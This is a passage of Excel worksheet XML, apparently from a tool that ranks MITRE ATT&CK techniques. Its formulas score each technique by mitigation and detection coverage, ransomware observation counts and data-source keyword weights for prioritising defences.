        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.35238095238095235</v>
      </c>
      <c r="W20">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X20">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y20">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z20">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>36</v>
      </c>
      <c r="AA20">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.36</v>
      </c>
      <c r="AB20">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.36</v>
      </c>
      <c r="AC20" s="29" t="s">
        <v>168</v>
      </c>
      <c r="AD20" s="25" t="str" cm="1">
        <f t="array" ref="AD20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC20)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE20" s="25">
        <f>IF(AD20="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF20" s="25" t="str" cm="1">
        <f t="array" ref="AF20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC20)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG20" s="25">
        <f>IF(AF20="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH20" s="25" t="str" cm="1">
        <f t="array" ref="AH20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC20)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI20" s="25">
        <f>IF(AH20="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ20" s="25" t="str" cm="1">
        <f t="array" ref="AJ20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC20)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK20" s="25">
        <f>IF(AJ20="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL20" s="25" t="str" cm="1">
        <f t="array" ref="AL20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC20)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM20" s="25">
        <f>IF(AL20="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN20" s="58">
        <v>2</v>
      </c>
      <c r="AO20" s="51">
        <v>1</v>
      </c>
      <c r="AP20" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26196827460333333</v>
      </c>
      <c r="AQ20" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.65100535978888896</v>
      </c>
      <c r="AR20" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.65100535978888896</v>
      </c>
      <c r="AS20" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT20" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU2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1" spans="1:47" ht="32.1">
      <c r="A21" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.25751562207000001</v>
      </c>
      <c r="B21" s="25">
        <f>SUM(H21,M21,V21)*(1+SUM(AE21,AG21,AI21,AK21,AM21))</f>
        <v>1.9084895540333335</v>
      </c>
      <c r="C21" s="25" t="s">
        <v>169</v>
      </c>
      <c r="D21" s="25" t="s">
        <v>170</v>
      </c>
      <c r="E21" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F21" s="51">
        <v>4</v>
      </c>
      <c r="G21" s="51">
        <v>3</v>
      </c>
      <c r="H21" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I21">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J21">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K21">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L21">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M21" s="44">
        <v>0.62304979000000005</v>
      </c>
      <c r="N21" s="51">
        <v>1</v>
      </c>
      <c r="O21" s="51">
        <v>8</v>
      </c>
      <c r="P21" s="51">
        <v>18</v>
      </c>
      <c r="Q21" s="51">
        <v>6</v>
      </c>
      <c r="R21" s="52" t="s">
        <v>171</v>
      </c>
      <c r="S21" s="51">
        <v>11</v>
      </c>
      <c r="T21" s="52" t="s">
        <v>172</v>
      </c>
      <c r="U21" s="51">
        <v>21</v>
      </c>
      <c r="V21" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.46190476190476193</v>
      </c>
      <c r="W21">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X21">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y21">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z21">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>33</v>
      </c>
      <c r="AA21">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.33</v>
      </c>
      <c r="AB21">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.33</v>
      </c>
      <c r="AC21" s="29" t="s">
        <v>173</v>
      </c>
      <c r="AD21" s="25" t="str" cm="1">
        <f t="array" ref="AD21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC21)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE21" s="25">
        <f>IF(AD21="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF21" s="25" t="str" cm="1">
        <f t="array" ref="AF21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG21" s="25">
        <f>IF(AF21="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH21" s="25" t="str" cm="1">
        <f t="array" ref="AH21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC21)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI21" s="25">
        <f>IF(AH21="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ21" s="25" t="str" cm="1">
        <f t="array" ref="AJ21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK21" s="25">
        <f>IF(AJ21="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL21" s="25" t="str" cm="1">
        <f t="array" ref="AL21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM21" s="25">
        <f>IF(AL21="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN21" s="60">
        <v>2</v>
      </c>
      <c r="AO21" s="51">
        <v>1</v>
      </c>
      <c r="AP21" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.25751562207000001</v>
      </c>
      <c r="AQ21" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.63616318467777788</v>
      </c>
      <c r="AR21" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.63616318467777788</v>
      </c>
      <c r="AS21" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT21" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU2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2" spans="1:47" ht="32.1">
      <c r="A22" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21770079209523813</v>
      </c>
      <c r="B22" s="25">
        <f>SUM(H22,M22,V22)*(1+SUM(AE22,AG22,AI22,AK22,AM22))</f>
        <v>1.1770079209523812</v>
      </c>
      <c r="C22" s="25" t="s">
        <v>174</v>
      </c>
      <c r="D22" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E22" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F22" s="51">
        <v>1</v>
      </c>
      <c r="G22" s="51">
        <v>1</v>
      </c>
      <c r="H22" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I22">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J22">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K22">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L22">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M22" s="44">
        <v>0.59605554000000005</v>
      </c>
      <c r="N22" s="51">
        <v>0</v>
      </c>
      <c r="O22" s="51">
        <v>10</v>
      </c>
      <c r="P22" s="51">
        <v>12</v>
      </c>
      <c r="Q22" s="51">
        <v>3</v>
      </c>
      <c r="R22" s="52" t="s">
        <v>176</v>
      </c>
      <c r="S22" s="51">
        <v>17</v>
      </c>
      <c r="T22" s="51" t="s">
        <v>177</v>
      </c>
      <c r="U22" s="51">
        <v>21</v>
      </c>
      <c r="V22" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.48095238095238102</v>
      </c>
      <c r="W22">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>38</v>
      </c>
      <c r="X22">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Y22">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Z22">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>25</v>
      </c>
      <c r="AA22">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.25</v>
      </c>
      <c r="AB22">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.25</v>
      </c>
      <c r="AC22" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD22" s="25" t="str" cm="1">
        <f t="array" ref="AD22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC22)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE22" s="25">
        <f>IF(AD22="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF22" s="25" t="str" cm="1">
        <f t="array" ref="AF22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC22)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG22" s="25">
        <f>IF(AF22="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH22" s="25" t="str" cm="1">
        <f t="array" ref="AH22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC22)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI22" s="25">
        <f>IF(AH22="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ22" s="25" t="str" cm="1">
        <f t="array" ref="AJ22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC22)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK22" s="25">
        <f>IF(AJ22="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL22" s="25" t="str" cm="1">
        <f t="array" ref="AL22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC22)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM22" s="25">
        <f>IF(AL22="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN22" s="52">
        <v>3</v>
      </c>
      <c r="AO22" s="51">
        <v>1</v>
      </c>
      <c r="AP22" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21770079209523813</v>
      </c>
      <c r="AQ22" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.3923359736507937</v>
      </c>
      <c r="AR22" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.3923359736507937</v>
      </c>
      <c r="AS22" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT22" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU2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3" spans="1:47" ht="32.1">
      <c r="A23" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.38183037836895239</v>
      </c>
      <c r="B23" s="25">
        <f>SUM(H23,M23,V23)*(1+SUM(AE23,AG23,AI23,AK23,AM23))</f>
        <v>1.4849704503561905</v>
      </c>
      <c r="C23" s="25" t="s">
        <v>179</v>
      </c>
      <c r="D23" s="25" t="s">
        <v>180</v>
      </c>
      <c r="E23" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F23" s="51">
        <v>4</v>
      </c>
      <c r="G23" s="51">
        <v>4</v>
      </c>
      <c r="H23" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="I23">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J23">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K23">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L23">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M23" s="44">
        <v>0.54990658999999997</v>
      </c>
      <c r="N23" s="51">
        <v>0</v>
      </c>
      <c r="O23" s="51">
        <v>21</v>
      </c>
      <c r="P23" s="51">
        <v>6</v>
      </c>
      <c r="Q23" s="51">
        <v>3</v>
      </c>
      <c r="R23" s="52" t="s">
        <v>181</v>
      </c>
      <c r="S23" s="51">
        <v>10</v>
      </c>
      <c r="T23" s="52" t="s">
        <v>182</v>
      </c>
      <c r="U23" s="51">
        <v>13</v>
      </c>
      <c r="V23" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3619047619047619</v>
      </c>
      <c r="W23">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X23">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y23">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z23">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>30</v>
      </c>
      <c r="AA23">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.3</v>
      </c>
      <c r="AB23">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.3</v>
      </c>
      <c r="AC23" s="29" t="s">
        <v>183</v>
      </c>
      <c r="AD23" s="25" t="str" cm="1">
        <f t="array" ref="AD23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC23)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE23" s="25">
        <f>IF(AD23="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF23" s="25" t="str" cm="1">
        <f t="array" ref="AF23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC23)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG23" s="25">
        <f>IF(AF23="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH23" s="25" t="str" cm="1">
        <f t="array" ref="AH23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC23)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI23" s="25">
        <f>IF(AH23="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ23" s="25" t="str" cm="1">
        <f t="array" ref="AJ23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC23)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK23" s="25">
        <f>IF(AJ23="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL23" s="25" t="str" cm="1">
        <f t="array" ref="AL23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC23)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM23" s="25">
        <f>IF(AL23="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN23" s="52">
        <v>7</v>
      </c>
      <c r="AO23" s="51">
        <v>1</v>
      </c>
      <c r="AP23" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.38183037836895239</v>
      </c>
      <c r="AQ23" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.49499015011873015</v>
      </c>
      <c r="AR23" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.49499015011873015</v>
      </c>
      <c r="AS23" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT23" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU2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4" spans="1:47" ht="48">
      <c r="A24" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.29521039047619047</v>
      </c>
      <c r="B24" s="25">
        <f>SUM(H24,M24,V24)*(1+SUM(AE24,AG24,AI24,AK24,AM24))</f>
        <v>0.61877057142857139</v>
      </c>
      <c r="C24" s="25" t="s">
        <v>184</v>
      </c>
      <c r="D24" s="25" t="s">
        <v>185</v>
      </c>
      <c r="E24" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F24" s="51">
        <v>1</v>
      </c>
      <c r="G24" s="51">
        <v>1</v>
      </c>
      <c r="H24" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I24">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J24">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K24">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L24">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M24" s="44">
        <v>0.44734200000000002</v>
      </c>
      <c r="N24" s="51">
        <v>2</v>
      </c>
      <c r="O24" s="51">
        <v>7</v>
      </c>
      <c r="P24" s="51">
        <v>3</v>
      </c>
      <c r="Q24" s="51">
        <v>3</v>
      </c>
      <c r="R24" s="51"/>
      <c r="S24" s="51">
        <v>0</v>
      </c>
      <c r="T24" s="51"/>
      <c r="U24" s="51">
        <v>0</v>
      </c>
      <c r="V24" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W24">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X24">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y24">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z24">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>15</v>
      </c>
      <c r="AA24">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.15</v>
      </c>
      <c r="AB24">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.15</v>
      </c>
      <c r="AC24" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD24" s="25" t="str" cm="1">
        <f t="array" ref="AD24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE24" s="25">
        <f>IF(AD24="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF24" s="25" t="str" cm="1">
        <f t="array" ref="AF24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC24)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG24" s="25">
        <f>IF(AF24="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
